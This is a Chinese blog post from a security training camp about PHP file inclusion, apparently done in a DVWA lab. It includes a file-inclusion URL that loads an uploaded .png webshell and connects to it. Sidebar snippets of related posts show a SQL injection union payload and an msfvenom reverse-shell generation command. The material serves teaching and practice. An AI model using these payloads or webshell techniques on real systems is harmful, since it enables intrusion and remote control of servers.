蓝盾实训营day4——文件包含漏洞

最新推荐文章于 2018-07-19 15:28:26 发布
最新推荐文章于 2018-07-19 15:28:26 发布
阅读量352 收藏 1
点赞数
分类专栏: 网络安全 蓝盾十天网络攻防实训营记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mingC0758/article/details/81010276
版权

解决VMware用NAT模式无法上网的问题

是因为本机的VMware的某些服务没有打开,右键计算机,点击“管理”,选择服务,打开VMware开头的服务,就可以使用NAT模式了。这个模式将本机和虚拟机连成一个局域网,这样就不会影响到外部网了。

文件包含漏洞

原理:php的include或者require可以引入外部文件,这些文件无论什么后缀都会交给php解析器执行。利用:进行目录遍历。

PHP文件包含的几个函数:

include():只有代码执行到该函数时才会包含文件进来,发生错误时只给出一个警告并继续向下执行。

include_once():和include()功能相同,区别在于当重复调用同一文件时,程序只调用一次。

require():只要程序执行就包含文件进来,发生错误时会输出错误结果并终止运行。

require_once():和require()功能相同,区别在于当重复调用同一文件时,程序只调用一次。

本地文件包含

这里写图片描述

远程文件包含

这里写图片描述

现在可以解决蓝盾实训营day3——文件上传、SQL注入进阶中的如何利用.png结尾的木马文件的问题了。

注意:在用菜刀连接之前,菜刀必须持有已登录的cookie:
这里写图片描述

连接木马地址:

http://192.168.148.1:8080/dvwa/vulnerabilities/fi/?page=file:///H:\momingqi\PHPTutorial\WWW\dvwa\hackable\uploads\newmuma.pn

这里写图片描述
连接成功。

分享

职业分析

  • 家庭环境分析
    • 经济状况
    • 家庭观念
    • 地域
  • 学校环境分析
    • 学习氛围
    • 学习专业
    • 实践经验
    • 学校排名
  • 行业环境
  • 社会环境

阶段目标

  • 提升能力
  • 初步定向
  • 自我沉淀
  • 重新选择

总结

今天虽然内容不多,但是感觉还是干货满满的。

mingC0758
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
蓝盾实训营day10——Web渗透实战
mingC0758的博客
07-20 877
扫描 SQL注入 开放了80端口,直接用浏览器访问靶机的网站,发现有SQL注入点: payload http://192.168.188.150/index.php?s=/news/6) and 1=2 union select 1,database(),3,4,5,6,version()-- 最终得到数据库账号密码: 这里用的是base64加密,可以直接解密成明...
蓝盾实训营day1——配置渗透环境和SQL注入
mingC0758的博客
07-09 786
蓝盾实训营day1——配置渗透环境和SQL注入 有幸参加了蓝盾在学校办的10天的实训营,把过程笔记发到这里,希望可以分享给更多的人。 黑客是如何入侵的 踩点 whois 扫描 nmap 提权 破坏 后门 搜索网络设备 shodan.io 远程摄像头…… 搜索jaws/1.0 country:”CN” windows服务器 不开源 收费 nma...
蓝盾实训营day6——日志查看和木马清除
mingC0758的博客
07-16 949
开启服务器日志和木马清除 开启服务器日志和木马清除 根据应用服务器的不同,有不同的日志开启方法,具体方法直接百度就行,比较简单。开启日志之后,用web扫描工具对网站进行扫描,利用文件上传漏洞进行挂马,然后我们可以查看日志,如果发现有未知页面被客户端访问,则可能发生了挂马行为,查找服务器有没有该木马文件,有就删掉。 apache-php开启日志方法 打开文件: Apa...
蓝盾实训营day7——meterpreter木马生成和利用
mingC0758的博客
07-17 1120
meterpreter木马生成和利用 木马生成 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.188.5 lport=5555 -f exe > shell.exe lhost 本地ip lport 本地端口 命令完成后,会在当前目录下生成一个...
蓝盾实训营day3——文件上传、SQL注入进阶
mingC0758的博客
07-11 1042
cookie欺骗 原理:把登陆后的cookie保存下来,在其他地方访问页面时携带这个cookie.. https可能做不了这个实验 HTTP Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。 HTTPS Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。 HTTP Cookie ...
蓝盾防火墙命令手册——很有用的
08-18
蓝盾防火墙的操作命令手册,希望对各位有用!
蓝盾防火墙操作 手册(V1.8)v1.rar
02-15
蓝盾防火墙是新一代高速状态检测的包过滤防火墙,采用专用网络处理器 集成安全系统架构,全面提升报文过滤检测、攻击检测、NAT特性的性能;同时 可实现安全业务的全方面拓展,其灵活的模块化结构综合报文过滤、...
蓝盾LANTIRN先进瞄准吊舱系统.pdf
06-11
蓝盾 LANTIRN 先进瞄准吊舱系统 蓝盾 LANTIRN 先进瞄准吊舱系统是美国诺斯罗普·格鲁门公司开发的一种先进的夜间低空导航和捕获目标、跟踪目标的综合系统,主要安装在战斗机上,用于夜间作战。该系统集激光、红外、...
蓝盾视安IP修改.rar
07-13
蓝盾视安IP修改工具详解》 在我们的日常网络管理工作中,特别是涉及到网络录像机和摄像头设备时,IP地址的管理和配置是一项重要的任务。"蓝盾视安IP修改.rar"是一个专门针对这类设备设计的实用工具,它可以帮助...
蓝盾硬盘还原V2.0.0.1054.zip
11-01
类似冰点的重启还原软件,无需注册码,永久免费 官网http://www.laneye.cn/,支持xp-win10 server2003 2008 2012 2016 2019等操作系统,适合个人、企业、校园网络使用,系统免维护
蓝盾实训营day2——使用Kali ettercap进行DNS欺骗
mingC0758的博客
07-10 1403
蓝盾实训2 XSS可以直接百度,比较简单;arp欺骗和dns欺骗是用kali linux下的ettercap实现的,可以百度一下这个工具的使用。由于在上课的时候用的是有道云笔记写的..图片上传比较麻烦,所以这篇博文没有示例图片。之后的博文我尽量在csdn上编辑,就可以上传一些操作过程的图片了。 arp欺骗 原理 ARP协议的功能是通过目标设备的IP地址,查询目标设备的MAC地址。 每...
蓝盾实训营day5——windows主机渗透、kali-metasploit、melody木马
mingC0758的博客
07-13 855
目录: 目标扫描 漏洞扫描 漏洞利用 提权 留后门 环境: windows xp sp2 (ms08_067漏洞利用) kali linux 2.0(配置好Nessus环境)
蓝盾实训营day8——IIS安全加固与证书签发
mingC0758的博客
07-18 717
网站安全狗(IIS版) 安全狗一般有以下功能: 防止流量攻击 防止SQL注入 文件上传防护 防止一句话木马的执行 开启安全狗的防护功能: 对网站进行SQL注入测试: 显示请求被拦截。 回到安全狗,查看防护日志: 用菜刀连接一句话木马的时候会被拦截: Windows防火墙 开启防火墙后,所有外部连接都会被拒绝。 可以通过添加例外-端口,来开放某个端口供外部...
蓝盾实训营day9——Windows主机安全加固和Android木马生成
mingC0758的博客
07-19 466
Windows主机安全加固 禁用guest账户 设置账户锁定策略 设置Administrator不允许终端登陆 使用注册表更改远程桌面监听的端口 用netstat -an 查看端口打开情况,关闭不必要的端口 关闭自动播放,防止U盘插入后病毒自动运行 7. ...
java毕设&课设-图书管理系统(完整的).zip
07-21
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
奇异谱分析SSA做信号分解,信号去噪、分解
最新发布
07-21
奇异谱分析SSA做信号分解,信号去噪、分解 1.运行main文件,其余为子函数 2.可以做回归预测,分类预测,时间序列预测 3.可以做信号分解,算法优化,区间预测 4.可以做组合模型预测 5.可以做聚类
ASP电子政务档案管理系统(源代码+论文).rar
07-21
ASP电子政务档案管理系统(源代码+论文)
如何批量管理蓝盾硬盘还原
05-11
如果您需要批量管理蓝盾硬盘还原,可以使用以下步骤: 1. 打开蓝盾硬盘还原软件,并选择“批量操作”选项。 2. 添加要还原的硬盘列表,并设置还原选项,如还原目标、还原方式等。 3. 点击“开始还原”按钮,等待硬盘还原完成。 在批量管理蓝盾硬盘还原时,需要注意以下事项: 1. 确认要还原的硬盘是否与蓝盾硬盘还原软件兼容。 2. 确认还原选项是否正确,以避免数据丢失或其他问题。 3. 确认硬盘还原完成后,进行测试以确保还原成功。 如果您对批量管理蓝盾硬盘还原不熟悉,建议先进行单个硬盘的还原测试,以确保操作正确无误。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值